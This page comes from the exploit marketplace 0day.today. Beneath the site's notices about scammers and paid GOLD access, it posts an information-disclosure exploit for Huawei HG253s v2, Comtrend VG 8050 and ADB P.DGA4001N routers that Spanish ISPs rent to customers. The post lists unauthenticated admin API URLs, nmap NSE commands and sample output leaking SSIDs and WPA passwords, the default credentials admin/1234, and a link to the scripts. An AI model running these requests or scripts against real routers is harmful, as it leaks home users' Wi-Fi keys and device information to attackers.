0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Huawei HG253s V2 Information Disclosure Vulnerability
Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IPhtml_253s/api/ntwk/WlanBasic http://IP/html_253s/api/system/diagnose_internet http://IP/html_253s/api/system/hostinfo?type=ethhost http://IP/html_253s/api/system/hostinfo?type=guesthost http://IP/html_253s/api/system/hostinfo?type=homehost http://IP/html_253s/api/system/hostinfo?type=wifihost http://IP/html_253s/api/system/wizardcfg Usage nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-vodafone-hua253s: | SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456 | Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX Comtrend VG 8050 Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Usage nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-comtrend-vg-8050: | SSID: MOVISTAR_XXX | Cipher Algorithm: WPA | Password WEP: | Password WPA: gTU3NkXE44RYjuM2RrxM | Password WPA2: | Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X ADB P.DGA4001N (HomeStation) Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Add the credentials by default are admin / 1234 Usage nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-homestation: | SSID: WLAN_HOME | Cipher Algorithm: WEP | Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X Here the scripts https://github.com/DaniLabs/scripts-nse # 0day.today [2024-12-25] #